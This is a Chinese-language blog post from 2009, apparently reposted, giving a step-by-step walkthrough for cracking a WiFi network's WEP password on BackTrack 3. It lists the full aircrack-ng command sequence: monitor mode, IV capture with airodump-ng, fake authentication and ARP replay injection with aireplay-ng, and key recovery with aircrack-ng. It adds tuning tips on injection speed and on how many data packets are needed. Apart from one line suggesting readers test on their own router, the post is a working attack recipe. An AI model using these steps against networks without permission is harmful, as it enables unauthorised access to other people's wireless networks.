BT3命令行解出WEP密码

作者:疯疯  发表在www.ssbbcc.com  于2009年04月30日

1、首先
ifconfig -a
查看自己的网卡,我的是eth1,也有的是WLAN
2、ifconfig -a eth1 up
驱动自己的网卡
3、airmon-ng start eth1 6
开启自己网卡的监听模式,频道号为你要破解的AP的频道号。查看的方法很多,我就不细说了。
4、airodump-ng –ivs -w result -c 6 eth1
开始抓包,–ivs代表只抓IVS包,此处是两个“-”-w代表写入文件,后面我写的是result即抓到的包都保存在以result为文件名的文件中,-c代表频道,这里是6。
5、开另一shell窗口
伪装连接 aireplay-ng -1 0 -e apID -a apmac -h 网卡mac eth1
成功后 aireplay-ng -3 -b -apmac -h  网卡mac -x 30 eth1
运行后会显示
read **** packets(got 0 arp requests),sent 0 packets…
大家不要着急,这是没有ARP包,耐心等待。不过我破的有的等到10W多还是没用,建议换个时间试试。
-x 30这个是关键,-x是指定注入速度,这里是30,一般资料都是 -x 1024,但实际上4311在BT3使用1024的注入速度,的确是可以的,能达到4、500,不过过不了1、2秒,就提示
write failed: Cannot allocate memory
wi_write(): Illegal seek
注入就停了。在论坛上看帖子有人说30就能稳定,经实验的确如此。大家可以尝试提高这个数值,看最大能到多少。毕竟30还是比较慢的,我室友看优酷都能到70多,不用注入,一会儿就够了。
6、等DATA到了15000左右
开另一shell窗口
aircrack-ng -n 64 -b 网卡mac result*.ivs
即可,如果没出密码,就是DATA不够,继续等几W个,再次运行。我的经验是10位纯数字密码3W内90%会出。

转自QQ
个人建议还是以BT3为平台,spoonwep为工具,破解WEP密码较方便。具体方法再编辑发布,测试网络请用自己的路由器。附VM下运行BT3文档

分类: 数码、网络、网站

相关标签: , , , , ,

原创文章如转载,请注明:转载自 我们都很疯 [http://www.ssbbcc.com]

感谢你发表评论 www.ssbbcc.com 鼓励全人类学习象形字



谷哥赞助

老年历

免责声明

本站资讯大多来源于互联网,如涉及您的版权请留言或者邮件root#ssbbcc.com告知。私人文章请务必要登陆阅读。
拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
违法信息举报请QQ676212374或者邮件root#ssbbcc.com联系

疯子亲友团